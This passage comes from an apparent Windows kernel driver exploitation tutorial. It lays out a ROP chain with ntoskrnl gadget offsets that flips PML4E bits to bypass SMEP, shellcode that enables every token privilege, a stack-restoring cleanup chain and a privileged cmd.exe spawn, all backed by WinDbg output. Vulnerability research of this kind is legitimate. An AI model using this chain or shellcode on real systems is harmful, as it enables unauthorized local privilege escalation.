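Patching the chain's own stack at run time sidesteps the need for a direct mov rcx, rax gadget, at the cost of requiring the ROP stack to be writable, which it is here since it lives in memory we allocated.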
Now that we have both indexes we can implement the CalculatePml4VirtualAddress() in the ROP chain.
As we can see, the ROP chain below first loads the constant value 0xffff into rax. After that it shifts rax left by 0x3 three times, which corresponds to a shift left by 0x9, and then performs an or between rax and the pml4SelfRefIndex stored in rcx. It repeats this four times, according to the algorithm in the referenced article.
Finally, it performs one last shift left of rax by 0xc and ORs rax with pml4Index*8. At this point the address of the PML4E is in rax:
//<get pml4 address>
ropStack[index] = g_ntbase + 0x203beb; index++; // pop rax; ret;
ropStack[index] = 0xffff; index++;
//first round
ropStack[index] = g_ntbase + 0x38aa1f; index++; // shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++; // shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++; // shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x24d001; index++; // or rax, rcx; ret;
//second round
ropStack[index] = g_ntbase + 0x38aa1f; index++; // shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++; // shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++; // shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x24d001; index++; // or rax, rcx; ret;
//third round
ropStack[index] = g_ntbase + 0x38aa1f; index++; // shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++; // shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++; // shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x24d001; index++; // or rax, rcx; ret;
//fourth round
ropStack[index] = g_ntbase + 0x38aa1f; index++; // shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++; // shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++; // shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x24d001; index++; // or rax, rcx; ret;
//fifth round
ropStack[index] = g_ntbase + 0x322d1b; index++; // shl rax, 0xc; ret;
ropStack[index] = g_ntbase + 0x2053e5; index++; // pop rcx; ret;
ropStack[index] = (DWORD64)pml4shellcode_index * 8; index++;
ropStack[index] = g_ntbase + 0x24d001; index++; // or rax, rcx; ret;
//<get pml4 address> pml4 address in rax
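The same computation can be replayed in user mode to see that it reproduces the PXE address reported by !pte earlier in this post (FFFFFEFF7FBFD1A0). This is only a sketch: calculate_pml4e_address is a hypothetical name, and the two index values (0x1fd and 0x34) are derived from the addresses shown in the WinDbg output rather than read from a live system.

```c
#include <assert.h>
#include <stdint.h>

/* Model of the <get pml4 address> part of the chain, one statement per
   gadget. self_ref_index plays the role of rcx during the first four
   rounds; pml4_index is the index of the shellcode address. */
uint64_t calculate_pml4e_address(uint64_t self_ref_index, uint64_t pml4_index) {
    uint64_t rax = 0xffff;                 /* pop rax; ret */

    for (int round = 0; round < 4; round++) {
        rax <<= 3;                         /* shl rax, 3; ret */
        rax <<= 3;                         /* shl rax, 3; ret */
        rax <<= 3;                         /* shl rax, 3; ret */
        rax |= self_ref_index;             /* or rax, rcx; ret */
    }

    rax <<= 0xc;                           /* shl rax, 0xc; ret */
    uint64_t rcx = pml4_index * 8;         /* pop rcx; ret */
    rax |= rcx;                            /* or rax, rcx; ret */
    return rax;
}

void check_pml4e_address(void) {
    /* 0x1fd: self-reference index, 0x34: (0x00001a1a1a003500 >> 39) & 0x1ff */
    assert(calculate_pml4e_address(0x1fd, 0x34) == 0xFFFFFEFF7FBFD1A0ULL);
}
```

The bit budget works out exactly: 16 bits of sign extension, four 9-bit copies of the self-reference index and a final 12-bit page offset add up to 64 bits.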
We then set to 0 the bit at index 2, meaning Owner bit = Supervisor, and the bit at index 63, the NX bit, using the btr instruction:
//<clean owner bit O=S position 2>
ropStack[index] = g_ntbase + 0x34bb9c; index++; // pop rdx; ret;
ropStack[index] = 0x2; index++;
ropStack[index] = g_ntbase + 0x354294; index++; // btr qword ptr [rax], rdx; ret;
//<clean owner bit O=S position 2>
//<clean NX bit position 63>
ropStack[index] = g_ntbase + 0x34bb9c; index++; // pop rdx; ret;
ropStack[index] = 63; index++;
ropStack[index] = g_ntbase + 0x354294; index++; // btr qword ptr [rax], rdx; ret;
//<clean NX bit position 63>
At the end of the chain we just need to execute the wbinvd instruction in order to write back and invalidate the CPU caches, ensuring the bits in the PML4E are actually modified, and then redirect execution to our shellcode:
ropStack[index] = g_ntbase + 0x370050; index++; // wbinvd; ret;
//<shellcode>
ropStack[index] = (ULONGLONG)sc; index++;
At this point we can recompile the PoC with our KVA/SMEP bypass ROP chain, set a breakpoint on the second instruction of our shellcode and notice the breakpoint gets hit successfully. We can also check the status of the PML4 entry to notice it was modified successfully:
```
0: kd> !process 0 0 DrvExpTemplate.exe
PROCESS ffffe18f381130c0
    SessionId: 1  Cid: 1e20    Peb: 2d546c7000  ParentCid: 0720
    DirBase: 1aea2f002  ObjectTable: ffff9602f9530040  HandleCount: 51.
    Image: DrvExpTemplate.exe
0: kd> .process /p /r /i ffffe18f381130c0
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff800`25e20ca0 cc              int     3
1: kd> dx @$curprocess.Name
@$curprocess.Name : DrvExpTemplate.exe
    Length : 0x12
1: kd> ba e 1 00001a1a`1a003503
1: kd> g
Breakpoint 0 hit
00001a1a`1a003503 488b08          mov     rcx,qword ptr [rax]
1: kd> uu 00001a1a`1a003500 L5
00001a1a`1a003500 4889c2          mov     rdx,rax
00001a1a`1a003503 488b08          mov     rcx,qword ptr [rax]
00001a1a`1a003506 480fbae902      bts     rcx,2
00001a1a`1a00350b 480fbae93f      bts     rcx,3Fh
00001a1a`1a003510 4831c0          xor     rax,rax
1: kd> uu @rip L1
00001a1a`1a003503 488b08          mov     rcx,qword ptr [rax]
1: kd> !pte @rip
                                           VA 00001a1a1a003503
PXE at FFFFFEFF7FBFD1A0    PPE at FFFFFEFF7FA34340    PDE at FFFFFEFF46868680    PTE at FFFFFE8D0D0D0018
contains 0A000001AA4D0863  contains 0A000001AF9D1867  contains 0A0000019DCD2867  contains 08000001AA0D6867
pfn 1aa4d0    ---DA--KWEV  pfn 1af9d1    ---DA--UWEV  pfn 19dcd2    ---DA--UWEV  pfn 1aa0d6    ---DA--UWEV
```
Increment privileges payload
Here’s the disassembled shellcode payload (generated with https://defuse.ca/online-x86-assembler.htm):
// increment privileges payload
xor rax,rax
mov rax,QWORD PTR gs:[rax+0x188]
mov rax,QWORD PTR [rax+0xb8]
mov r8,QWORD PTR [rax+0x4b8]
and r8,0xfffffffffffffff0
movabs r9,0x1ff2ffffbc
mov QWORD PTR [r8+0x40],r9
mov QWORD PTR [r8+0x48],r9
xor rax,rax //just a random instruction
It does the following:
- Retrieve the current process’s _EPROCESS structure
- Retrieve the associated _TOKEN structure
- Modify the fields Present and Enabled of _SEP_TOKEN_PRIVILEGES structure in order to enable all the privileges.
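The two constants used by the payload can be examined from user mode. In the sketch below the helper names and the sample token reference 0xffff8000deadbee7 are hypothetical; the mask 0x1ff2ffffbc and the and with 0xfffffffffffffff0 come straight from the payload, where the latter strips the low 4 bits of the token reference that do not belong to the pointer.

```c
#include <assert.h>
#include <stdint.h>

/* Constant written by the payload to the Present and Enabled fields. */
#define ALL_PRIVILEGES_MASK 0x1ff2ffffbcULL

/* and r8, 0xfffffffffffffff0: drop the low 4 bits of the token reference. */
uint64_t token_from_fast_ref(uint64_t fast_ref) {
    return fast_ref & ~0xFULL;
}

/* Returns 1 if the privilege with the given index is set in the mask. */
int privilege_is_set(uint64_t mask, unsigned int index) {
    if (index >= 64) {
        return 0;
    }
    return (int)((mask >> index) & 1);
}

/* Counts how many privileges the mask contains. */
unsigned int count_privileges(uint64_t mask) {
    unsigned int count = 0;
    for (unsigned int index = 0; index < 64; index++) {
        count += (unsigned int)privilege_is_set(mask, index);
    }
    return count;
}

void check_privilege_mask(void) {
    assert(privilege_is_set(ALL_PRIVILEGES_MASK, 20));   /* SeDebugPrivilege */
    assert(privilege_is_set(ALL_PRIVILEGES_MASK, 10));   /* SeLoadDriverPrivilege */
    assert(!privilege_is_set(ALL_PRIVILEGES_MASK, 6));   /* index 6 is not used */
    assert(count_privileges(ALL_PRIVILEGES_MASK) == 31);
    /* Hypothetical token reference with a non-zero low nibble. */
    assert(token_from_fast_ref(0xffff8000deadbee7ULL) == 0xffff8000deadbee0ULL);
}
```

The 31 set bits correspond to indexes 2 to 5, 7 to 23, 25 and 28 to 36, which is the same set of privileges listed by the !token output further down.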
At this point we can try compiling our exploit again, set a breakpoint at the last instruction in our shellcode (the final xor rax,rax instruction) and inspect the current token privileges with the !token command. We can see all the privileges get enabled successfully, as shown below:
0: kd> ba e 1 00001a1a`1a00353f 0: kd> g Breakpoint 0 hit 00001a1a`1a00353f 4831c0 xor rax,rax 1: kd> !token Thread is not impersonating. Using process token... [...] Privs: 02 0x000000002 SeCreateTokenPrivilege Attributes - Enabled 03 0x000000003 SeAssignPrimaryTokenPrivilege Attributes - Enabled 04 0x000000004 SeLockMemoryPrivilege Attributes - Enabled 05 0x000000005 SeIncreaseQuotaPrivilege Attributes - Enabled 07 0x000000007 SeTcbPrivilege Attributes - Enabled 08 0x000000008 SeSecurityPrivilege Attributes - Enabled 09 0x000000009 SeTakeOwnershipPrivilege Attributes - Enabled 10 0x00000000a SeLoadDriverPrivilege Attributes - Enabled 11 0x00000000b SeSystemProfilePrivilege Attributes - Enabled 12 0x00000000c SeSystemtimePrivilege Attributes - Enabled 13 0x00000000d SeProfileSingleProcessPrivilege Attributes - Enabled 14 0x00000000e SeIncreaseBasePriorityPrivilege Attributes - Enabled 15 0x00000000f SeCreatePagefilePrivilege Attributes - Enabled 16 0x000000010 SeCreatePermanentPrivilege Attributes - Enabled 17 0x000000011 SeBackupPrivilege Attributes - Enabled 18 0x000000012 SeRestorePrivilege Attributes - Enabled 19 0x000000013 SeShutdownPrivilege Attributes - Enabled 20 0x000000014 SeDebugPrivilege Attributes - Enabled 21 0x000000015 SeAuditPrivilege Attributes - Enabled 22 0x000000016 SeSystemEnvironmentPrivilege Attributes - Enabled 23 0x000000017 SeChangeNotifyPrivilege Attributes - Enabled Default 25 0x000000019 SeUndockPrivilege Attributes - Enabled 28 0x00000001c SeManageVolumePrivilege Attributes - Enabled 29 0x00000001d SeImpersonatePrivilege Attributes - Enabled 30 0x00000001e SeCreateGlobalPrivilege Attributes - Enabled Default 31 0x00000001f SeTrustedCredManAccessPrivilege Attributes - Enabled 32 0x000000020 SeRelabelPrivilege Attributes - Enabled 33 0x000000021 SeIncreaseWorkingSetPrivilege Attributes - Enabled 34 0x000000022 SeTimeZonePrivilege Attributes - Enabled 35 0x000000023 SeCreateSymbolicLinkPrivilege Attributes - Enabled 36 0x000000024 
SeDelegateSessionUserImpersonatePrivilege Attributes - Enabled Authentication ID: (0,5c94a) Impersonation Level: Anonymous TokenType: Primary [...]
Restoring execution
At this point we must find a way to restore the execution flow in order not to cause a BSOD after executing our shellcode. We have two options:
- Execute a sysret instruction. This is the counterpart of syscall and allows transitioning from kernel-mode to user-mode.
- Reset the stack pointer to the right location in the stack so that the execution flow gets restored from where it was hijacked.
I preferred to go with the second option as in my opinion it is cleaner and does not leave the memory in an inconsistent state.
The first option instead may, for example, cause memory leaks or leave some mutexes locked. This is because the functions in the call stack won’t finish normally, which means resources acquired by those functions (locks, allocations in the pool…) may not be released.
We will also have to restore the PML4 entry to its original value, as I ran into some issues when our process tried to exit.
Retrieving the original value of the stack pointer
An easy way to retrieve the original value of the stack pointer, before the pivot gadget tampers with it, is to make the following assumption:
The stack frames on the stack will always have the same size. If this is true, then the offset between the initial stack pointer and the original stack pointer before the hijacking will always be the same.
Let’s verify this in WinDbg. Let’s put a breakpoint at atdcm64a+0x223f, which is where our vulnerable driver calls IofCallDriver():
1: kd> ba e 1 fffff800`2d9f223f 1: kd> g Breakpoint 1 hit atdcm64a+0x223f: fffff800`2d9f223f ff15fb2d0000 call qword ptr [atdcm64a+0x5040 (fffff800`2d9f5040)] 0: kd> t nt!IofCallDriver: fffff800`25cebea0 4883ec38 sub rsp,38h 0: kd>
Let’s step until we reach jmp rax, inside nt!guard_dispatch_icall, the instruction that allows us to hijack the execution flow. Now, let’s inspect the call stack:
1: kd> p
nt!guard_dispatch_icall+0x71:
fffff800`25e21b01 ffe0 jmp rax
1: kd> k
 # Child-SP          RetAddr           Call Site
00 ffffde08`f566f458 fffff800`25cebef5 nt!guard_dispatch_icall+0x71
01 ffffde08`f566f460 fffff800`2d9f2245 nt!IofCallDriver+0x55
02 ffffde08`f566f4a0 fffff800`2d9f16c3 atdcm64a+0x2245
03 ffffde08`f566f520 fffff800`25cebef5 atdcm64a+0x16c3
04 ffffde08`f566f720 fffff800`26140060 nt!IofCallDriver+0x55
05 ffffde08`f566f760 fffff800`26141a90 nt!IopSynchronousServiceTail+0x1d0
06 ffffde08`f566f810 fffff800`26141376 nt!IopXxxControlFile+0x700
07 ffffde08`f566fa00 fffff800`25e2bbe5 nt!NtDeviceIoControlFile+0x56
08 ffffde08`f566fa70 00007ff8`01b6f454 nt!KiSystemServiceCopyEnd+0x25
09 0000007c`fd2ffbb8 00007fff`ff27664b 0x00007ff8`01b6f454
0a 0000007c`fd2ffbc0 0000007c`fd2ffc30 0x00007fff`ff27664b
0b 0000007c`fd2ffbc8 0000007c`fd2ffc38 0x0000007c`fd2ffc30
0c 0000007c`fd2ffbd0 0000007c`fd2ffc40 0x0000007c`fd2ffc38
0d 0000007c`fd2ffbd8 00000000`00000000 0x0000007c`fd2ffc40
From the call stack we can see that after nt!guard_dispatch_icall the execution should return to 0xfffff80025cebef5 (the RetAddr of the first row in the call stack).
If we inspect the data stored in the stack, starting from RSP, we can see that this return address is stored at 0xffffde08f566f458, which is exactly where RSP points:
1: kd> dq @rsp
ffffde08`f566f458 fffff800`25cebef5 00000000`00000000
ffffde08`f566f468 fffff800`25cebea0 00000000`00000010
ffffde08`f566f478 00000000`00040304 ffffde08`f566f498
ffffde08`f566f488 00000000`00000018 ffffde08`f566f4a0
ffffde08`f566f498 fffff800`2d9f2245 0000001a`ff000000
ffffde08`f566f4a8 00000000`00000000 ffffe18f`323e500d
ffffde08`f566f4b8 fffff800`25dd763f 00000000`00000000
ffffde08`f566f4c8 ffffde08`f566f4f0 ffffde08`f566f4e0
Let’s also retrieve the _ETHREAD and _KTHREAD structs of our current thread:
1: kd> !thread
THREAD ffffe18f35335080 Cid 1304.08d4 Teb: 0000007cfd07a000 Win32Thread: 0000000000000000 RUNNING on processor 1
IRP List:
    ffffe18f36d48000: (0006,1360) Flags: 00060000 Mdl: 00000000
    ffffe18f34c31cd0: (0006,0118) Flags: 00060070 Mdl: 00000000
[...]
1: kd> dt nt!_ETHREAD ffffe18f35335080
   +0x000 Tcb : _KTHREAD
   +0x480 CreateTime : _LARGE_INTEGER 0x01dad54a`f0da9edd
[...]
1: kd> dx -id 0,0,ffffe18f36a840c0 -r1 (*((ntkrnlmp!_KTHREAD *)0xffffe18f35335080))
(*((ntkrnlmp!_KTHREAD *)0xffffe18f35335080)) [Type: _KTHREAD]
    [+0x000] Header [Type: _DISPATCHER_HEADER]
    [+0x018] SListFaultAddress : 0x0 [Type: void *]
    [+0x020] QuantumTarget : 0x79a5af2 [Type: unsigned __int64]
    [+0x028] InitialStack : 0xffffde08f566fc70 [Type: void *]
    [+0x030] StackLimit : 0xffffde08f566a000 [Type: void *]
    [+0x038] StackBase : 0xffffde08f5670000 [Type: void *]
    [+0x040] ThreadLock : 0x0 [Type: unsigned __int64]
[...]
Notice the value of InitialStack.
If we subtract the current value of RSP from InitialStack, we get an offset of 0x818.
1: kd> ? 0xffffde08f566fc70-ffffde08`f566f458
Evaluate expression: 2072 = 00000000`00000818
If we repeat the same procedure after restarting the system, we will notice that the offset between RSP and InitialStack does not change.
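To see why the offset stays constant, it can help to break it down frame by frame. The sketch below is plain user-mode C using the Child-SP values from the call stack above plus the InitialStack value read from _KTHREAD; the array and function names are hypothetical. Each gap is fixed by the compiled code on this call path, so their sum is fixed too, as long as the same kernel and driver builds are used.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Child-SP of kernel frames 00..08 from the call stack above, followed by
   the InitialStack value read from _KTHREAD in the same session. */
static const uint64_t kStackMarks[] = {
    0xffffde08f566f458ULL, /* 00 nt!guard_dispatch_icall+0x71 */
    0xffffde08f566f460ULL, /* 01 nt!IofCallDriver+0x55 */
    0xffffde08f566f4a0ULL, /* 02 atdcm64a+0x2245 */
    0xffffde08f566f520ULL, /* 03 atdcm64a+0x16c3 */
    0xffffde08f566f720ULL, /* 04 nt!IofCallDriver+0x55 */
    0xffffde08f566f760ULL, /* 05 nt!IopSynchronousServiceTail+0x1d0 */
    0xffffde08f566f810ULL, /* 06 nt!IopXxxControlFile+0x700 */
    0xffffde08f566fa00ULL, /* 07 nt!NtDeviceIoControlFile+0x56 */
    0xffffde08f566fa70ULL, /* 08 nt!KiSystemServiceCopyEnd+0x25 */
    0xffffde08f566fc70ULL  /* InitialStack */
};
#define MARK_COUNT (sizeof(kStackMarks) / sizeof(kStackMarks[0]))

/* Sums the gaps between consecutive stack marks (lowest address first). */
static uint64_t total_distance(const uint64_t *marks, size_t count)
{
    uint64_t total = 0;
    assert(count >= 2);
    for (size_t i = 1; i < count; i++) {
        assert(marks[i] > marks[i - 1]); /* the stack grows downwards */
        total += marks[i] - marks[i - 1];
    }
    return total;
}
```

With the values above, the gaps add up to 0x818, the same offset WinDbg computed.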
Therefore, in order to retrieve the original value of RSP, that is, its value before we tamper with it through our pivot gadget, we can:
- Retrieve the _KTHREAD structure of the current thread through the gs register.
- Retrieve the value of InitialStack from _KTHREAD.
- Subtract 0x818 from InitialStack. The result of the subtraction is the original value of RSP.
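The steps above can be modelled in user mode with a fake _KTHREAD buffer. This is only a sketch under stated assumptions: the real shellcode reads the structure through gs in kernel mode, the 0x28 offset of InitialStack and the 0x818 delta come from the debugging session shown in this article and may differ on other builds, and the function names are invented for the example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define KTHREAD_INITIAL_STACK_OFFSET 0x28  /* from the dx output above */
#define HIJACK_RSP_DELTA             0x818 /* InitialStack - RSP at jmp rax */

/* Reads InitialStack out of a raw _KTHREAD image and derives the value
   RSP had right before the pivot gadget ran. */
static uint64_t original_rsp_from_kthread(const unsigned char *kthread, size_t size)
{
    uint64_t initial_stack;
    assert(size >= KTHREAD_INITIAL_STACK_OFFSET + sizeof(initial_stack));
    memcpy(&initial_stack, kthread + KTHREAD_INITIAL_STACK_OFFSET,
           sizeof(initial_stack));
    return initial_stack - HIJACK_RSP_DELTA;
}

/* Builds a zeroed fake _KTHREAD holding the InitialStack value observed in
   WinDbg and runs the computation on it. */
static uint64_t demo_original_rsp(void)
{
    unsigned char fake_kthread[0x40] = {0};
    const uint64_t initial_stack = 0xffffde08f566fc70ULL;
    memcpy(fake_kthread + KTHREAD_INITIAL_STACK_OFFSET, &initial_stack,
           sizeof(initial_stack));
    return original_rsp_from_kthread(fake_kthread, sizeof(fake_kthread));
}
```

For the session shown above, the result matches the RSP value observed at the jmp rax instruction, 0xffffde08f566f458.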
Crafting the cleanup ROP chain
Now that we know how to retrieve the original value of RSP, we need to modify our shellcode and craft a cleanup ROP chain that will perform the following operations:
- Restore the original value of the PML4 entry.
- Restore the original value of RSP so that execution flow can proceed as it was supposed to before we hijacked it.
Here’s the final shellcode:
// storing in RCX original PML4E value
mov rdx,rax
mov rcx,QWORD PTR [rax]
bts rcx,0x2
bts rcx,0x3f
// increment privileges payload
xor rax,rax
mov rax,QWORD PTR gs:[rax+0x188]
mov rax,QWORD PTR [rax+0xb8]
mov r8,QWORD PTR [rax+0x4b8]
and r8,0xfffffffffffffff0
movabs r9,0x1ff2ffffbc
mov QWORD PTR [r8+0x40],r9
mov QWORD PTR [r8+0x48],r9
// storing in cleanup ropchain original rsp value
xor rax,rax
mov rax,QWORD PTR gs:[rax+0x188]
mov rax,QWORD PTR [rax+0x28]
sub rax,0x818
mov QWORD PTR [rsp+0x20],rax
mov rax,rcx
ret
Before the increment privileges payload we perform the following operations:
- Move the PML4E’s address into rdx.
- Recompute the original PML4E value and store it in rcx.
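The recomputation done by the two bts instructions can be sketched in C as follows. On x86-64, bit 2 of a paging entry is the User/Supervisor flag and bit 63 is the no-execute flag; the sketch assumes the earlier stage of the exploit cleared exactly these two bits, so setting them again yields the original entry. The function names and the sample entry value used to exercise it are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define PML4E_USER_BIT 2  /* User/Supervisor flag */
#define PML4E_NX_BIT   63 /* no-execute flag */

/* Equivalent of `bts reg, bit`, ignoring the carry flag side effect. */
static uint64_t set_bit(uint64_t value, unsigned bit)
{
    assert(bit < 64);
    return value | (1ULL << bit);
}

/* Mirrors `bts rcx,0x2` followed by `bts rcx,0x3f` in the shellcode. */
static uint64_t restore_pml4e(uint64_t tampered)
{
    return set_bit(set_bit(tampered, PML4E_USER_BIT), PML4E_NX_BIT);
}
```

For a hypothetical tampered entry of 0x0000000123456063 this gives 0x8000000123456067, and applying the function twice changes nothing further.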
After the increment privileges payload we perform the following operations:
- Use rax to retrieve the InitialStack field from the current thread’s _KTHREAD structure.
- Subtract the offset 0x818 from rax in order to obtain the original rsp value.
- Store the original rsp value in our cleanup ROP chain with the mov QWORD PTR [rsp+0x20],rax instruction.
- Move the original value of the PML4E into rax.
Here’s our cleanup ROP chain that is executed after the shellcode:
//<shellcode>
ropStack[index] = (ULONGLONG)sc; index++;
//<cleanup>
ropStack[index] = g_ntbase + 0x35dbc9; index++; // mov qword ptr [rdx], rax; ret;
ropStack[index] = g_ntbase + 0x3d4cba; index++; // xor rax, rax; ret;
ropStack[index] = g_ntbase + 0x370050; index++; // wbinvd; ret;
ropStack[index] = g_ntbase + 0x20505a; index++; // pop rsp; ret;
ropStack[index] = 0x4141414141414141; index++; // filled with rsp value
//<cleanup>
In this final ROP chain we first restore the PML4 entry: recall that the shellcode leaves the address of the PML4E in rdx and its original value in rax, so the mov qword ptr [rdx], rax gadget writes the original value back. Finally, we pop into RSP the original value of the stack pointer, that is, the value it had before we hijacked execution with the pivot gadget.
The value 0x4141414141414141 in the ROP chain is just a placeholder: it is overwritten with the real value by the mov QWORD PTR [rsp+0x20],rax instruction executed in our shellcode.
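The 0x20 displacement follows from the layout of the chain. When the shellcode starts running, the ret that jumped to it has already consumed the shellcode slot, so RSP points at the first cleanup gadget and the placeholder sits four slots further. Below is a small user-mode model of this tail of the chain; the slot names are invented for the example and the gadget slots are left as zeroes because only their positions matter here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define RSP_PLACEHOLDER 0x4141414141414141ULL

/* Slots of the tail of the ROP chain, in the order they are pushed. */
enum {
    SLOT_SHELLCODE,   /* (ULONGLONG)sc */
    SLOT_WRITE_PML4E, /* mov qword ptr [rdx], rax; ret; */
    SLOT_XOR_RAX,     /* xor rax, rax; ret; */
    SLOT_WBINVD,      /* wbinvd; ret; */
    SLOT_POP_RSP,     /* pop rsp; ret; */
    SLOT_RSP_VALUE,   /* placeholder patched by the shellcode */
    SLOT_COUNT
};

/* Byte distance from RSP, as seen inside the shellcode, to the placeholder. */
static size_t placeholder_offset(void)
{
    return (size_t)(SLOT_RSP_VALUE - (SLOT_SHELLCODE + 1)) * sizeof(uint64_t);
}

/* Emulates `mov QWORD PTR [rsp+0x20],rax` on a model of the chain and
   returns the value that `pop rsp` would then load. */
static uint64_t patch_chain(uint64_t *chain, size_t slots, uint64_t original_rsp)
{
    unsigned char *rsp = (unsigned char *)&chain[SLOT_SHELLCODE + 1];
    assert(slots > (size_t)SLOT_RSP_VALUE);
    memcpy(rsp + placeholder_offset(), &original_rsp, sizeof(original_rsp));
    return chain[SLOT_RSP_VALUE];
}

/* Builds the model chain and patches it with the RSP value from WinDbg. */
static uint64_t demo_patch(void)
{
    uint64_t chain[SLOT_COUNT] = {0};
    chain[SLOT_RSP_VALUE] = RSP_PLACEHOLDER;
    return patch_chain(chain, SLOT_COUNT, 0xffffde08f566f458ULL);
}
```

If gadgets are added to or removed from the cleanup chain, the displacement in the shellcode has to be adjusted accordingly.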
Getting a high-privileged shell
All that is left is to spawn cmd.exe at the end of our exploit: if the ROP chain completes successfully, we should get a shell with all privileges enabled. We can use the system() function at the end of our main() function to easily spawn a shell.
int main() {
    [...]
    arbitraryCallDriver(outputBuffer, SIZE_BUF);
    printf("[+] arbitraryCallDriver returned successfully.\n");
    printf("[*] spawning system shell...\n");
    system("cmd.exe");
    return 0;
}
The full code of the exploit is available here on GitHub (master branch). At this point after compiling our exploit we should obtain a shell with all privileges enabled!
Conclusion
In this series of articles, I explained the process of finding vulnerabilities in kernel drivers using manual static analysis techniques and developing an exploit that takes advantage of an arbitrary pointer dereference.
Credits
Credits go to:
- @ommadawn46, for his awesome article about how KVA works and how to bypass it.
- Enrique Nissim and Nicolas Economou, for their research paper.
- Alexandru Uifalvi and Morten Schenk for the exploit code.
In addition I would like to thank:
- Cedric Halbronn for his amazing courses on OST2.
- Connor McGarr and Paolo Stagno for their awesome blog posts on the topic.
- Igor Skochinsky for the Igor’s tips on Hex-Rays (all I’ve learned about IDA Pro was thanks to his tips).
Contacts
If you have any questions, feel free to reach me at the following contacts: